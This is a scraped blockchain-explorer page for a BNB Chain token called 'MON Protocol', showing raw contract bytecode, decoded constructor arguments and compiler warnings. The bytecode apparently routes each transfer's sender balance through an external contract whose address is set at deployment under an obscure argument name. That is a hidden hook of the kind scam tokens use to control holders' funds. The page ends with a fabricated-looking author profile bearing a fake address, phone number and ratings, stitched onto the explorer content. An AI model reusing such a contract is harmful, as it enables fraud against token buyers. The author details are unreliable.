60405180910390fd5b80600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108a59190610fff565b60405180910390a3505050565b60006108be8484610650565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610941578181101561092a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610921906114a0565b60405180910390fd5b6109408484848461093b91906112fc565b6106e9565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad90611532565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c906115c4565b60405180910390fd5b610a70838383600760008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d7f565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610b35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2c90611656565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b8091906112fc565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c0e91906111ca565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cae9190610fff565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166399ef4af0868686866040518563ffffffff1660e01b8152600401610de29493929190611676565b6020604051808303816000875af1158015610e01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e2591906116d0565b9050949350505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e69578082015181840152602081019050610e4e565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e9182610e2f565b610e9b8185610e3a565b9350610eab818560208601610e4b565b610eb481610e75565b840191505092915050565b60006020820190508181036000830152610ed98184610e86565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f1182610ee6565b9050919050565b610f2181610f06565b8114610f2c57600080fd5b50565b600081359050610f3e81610f18565b92915050565b6000819050919050565b610f5781610f44565b8114610f6257600080fd5b50565b600081359050610f7481610f4e565b92915050565b60008060408385031215610f9157610f90610ee1565b5b6000610f9f85828601610f2f565b9250506020610fb085828601610f65565b9150509250929050565b60008115159050919050565b610fcf81610fba565b82525050565b6000602082019050610fea6000830184610fc6565b92915050565b610ff981610f44565b82525050565b60006020820190506110146000830184610ff0565b92915050565b60008060006060848603121561103357611032610ee1565b5b600061104186828701610f2f565b935050602061105286828701610f2f565b925050604061106386828701610f65565b9150509250925092565b600060ff82169050919050565b6110838161106d565b82525050565b600060208201905061109e600083018461107a565b92915050565b6000602082840312156110ba576110b9610ee1565b5b60006110c884828501610f2f565b91505092915050565b6110da81610f06565b82525050565b60006020820190506110f560008301846110d1565b92915050565b6000806040838503121561111257611111610ee1565b5b600061112085828601610f2f565b925050602061113185828601610f2f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061118257607f821691505b6020821081036111955761119461113b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006111d582610f44565b91506111e083610f44565b92508282019050808211156111f8576111f761119b565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611234602083610e3a565b915061123f826111fe565b602082019050919050565b6000602082019050818103600083015261126381611227565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006112c6602583610e3a565b91506112d18261126a565b604082019050919050565b600060208201905081810360008301526112f5816112b9565b9050919050565b600061130782610f44565b915061131283610f44565b925082820390508181111561132a5761132961119b565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061138c602483610e3a565b915061139782611330565b604082019050919050565b600060208201905081810360008301526113bb8161137f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061141e602283610e3a565b9150611429826113c2565b604082019050919050565b6000602082019050818103600083015261144d81611411565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061148a601d83610e3a565b915061149582611454565b602082019050919050565b600060208201905081810360008301526114b98161147d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061151c602583610e3a565b9150611527826114c0565b604082019050919050565b6000602082019050818103600083015261154b8161150f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006115ae602383610e3a565b91506115b982611552565b604082019050919050565b600060208201905081810360008301526115dd816115a1565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611640602683610e3a565b915061164b826115e4565b604082019050919050565b6000602082019050818103600083015261166f81611633565b9050919050565b600060808201905061168b60008301876110d1565b61169860208301866110d1565b6116a56040830185610ff0565b6116b26060830184610ff0565b95945050505050565b6000815190506116ca81610f4e565b92915050565b6000602082840312156116e6576116e5610ee1565b5b60006116f4848285016116bb565b9150509291505056fea2646970667358221220f7c4a9de1e2c7f2e57ce7284caad4fe9bacbe13e519f50d3e349fe3c0859d24e64736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000018a3b17bf13f633c40067ef46f1c418e41db35d4000000000000000000000000000000000000000000000000000000003b9aca00

-----Decoded View---------------
Arg [0] : aq5stupa (uint256): 140666261017146767411061059163201541644389922260
Arg [1] : totalSupply_ (uint256): 1000000000

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000018a3b17bf13f633c40067ef46f1c418e41db35d4
Arg [1] : 000000000000000000000000000000000000000000000000000000003b9aca00


Loading...

Loading

[Download: CSV Export ]

[Download: CSV Export ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.

Connect a Wallet
Connect a Wallet

Compiler specific version warnings:

The compiled contract might be susceptible to VerbatimInvalidDeduplication (low-severity), FullInlinerNonExpressionSplitArgumentEvaluationOrder (low-severity), MissingSideEffectsOnSelectorAccess (low-severity) Solidity Compiler Bugs.

MON Protocol (MON) Token Tracker | BscScan (2024)
Top Articles
Latest Posts
Article information

Author: Trent Wehner

Last Updated:

Views: 5669

Rating: 4.6 / 5 (76 voted)

Reviews: 91% of readers found this page helpful

Author information

Name: Trent Wehner

Birthday: 1993-03-14

Address: 872 Kevin Squares, New Codyville, AK 01785-0416

Phone: +18698800304764

Job: Senior Farming Developer

Hobby: Paintball, Calligraphy, Hunting, Flying disc, Lapidary, Rafting, Inline skating

Introduction: My name is Trent Wehner, I am a talented, brainy, zealous, light, funny, gleaming, attractive person who loves writing and wants to share my knowledge and understanding with you.